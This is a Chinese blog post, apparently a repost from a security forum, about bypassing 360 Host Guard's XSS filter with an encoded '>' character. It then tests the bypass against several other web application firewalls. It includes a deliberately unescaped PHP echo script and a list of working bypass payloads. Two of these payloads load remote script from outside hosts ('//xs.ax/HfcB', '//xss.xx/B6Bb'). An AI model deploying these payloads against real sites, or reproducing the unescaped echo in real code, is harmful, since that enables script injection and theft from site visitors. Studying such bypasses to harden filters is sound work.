某主机卫士xss绕过
2020-02-24 10:22:05 Author: xz.aliyun.com(查看原文) 阅读量:311 收藏

前言


360主机卫士是360旗下的服务器安全软件,为站长免费提供网站后门检测、木马查杀,网站补丁、漏洞防护等服务...

(虽然软件几年前就停止更新,官网挂了,但是从当时的评论上看软件还是很不错的。)

环境


火狐

360主机卫士Apache版

phpStudy2016(PHP-5.4.45+Apache)

测试代码

<?php   
  $input = @$_REQUEST["xss"];
  echo "<div>".$input."</div>"
?>

测试


习惯性的直接上 Burp 用平时收集的 payload fuzz 一遍,结果不怎么理想,能过的很鸡肋...然后我就去网上找资料,找到了一篇文章xss加入某些字符即可过大多数waf的思路及一些思考根据里面的思路可以绕过。

<svg onload> 拦截

<svg > onload>不拦截

具体绕过就是先把 > html实体编码

&#62 URL编码

大部分 xss payload 加上 %26%2362 即可绕过,但是类似 alert(1) 括号可能会被拦截 可以用反引号替换

<svg %26%2362 onload=alert`1`>

给几个测试绕过的 payload

<style  %26%2362 onload=alert`1`>
<img %26%2362 src=1  onerror=alert`1`>
<audio %26%2362 src=x  onerror=alert`1`>
<svg %26%2362 onload=appendChild(createElement('script')).src='//xs.ax/HfcB'>

该文章在最后说明此方法可以绕过多款waf,接下来我们来测试。

云锁

绕过

<svg %26%2362 onload=alert`1`>

奇安信CDN

拦截

<svg %26%2362 onload=alert`1`>

绕过方法(使用HTML5新标签)

<select autofocus onfocus=[2].find(alert)>

安全狗

绕过

阿里云

拦截

绕过方法(这个百度下就有)

<img src=# onerror=alert`2`>
<input onfocus="document.body.appendChild(createElement('script')).src='//xss.xx/B6Bb'" autofocus>

百度云加速

绕过

小结

此次利用 > 字符的编码绕过的姿势,再到其他 waf 测试到此结束,至于其他特殊字符是否也有绕过,感兴趣的可以研究下,如有错误之处,请师傅指正。
(文笔尚浅,内容浅显,不足之处欢迎师傅们指点和纠正,感激不尽)

参考

xss加入某些字符即可过大多数waf的思路及一些思考


文章来源: http://xz.aliyun.com/t/7241
如有侵权请联系:admin#unsafe.sh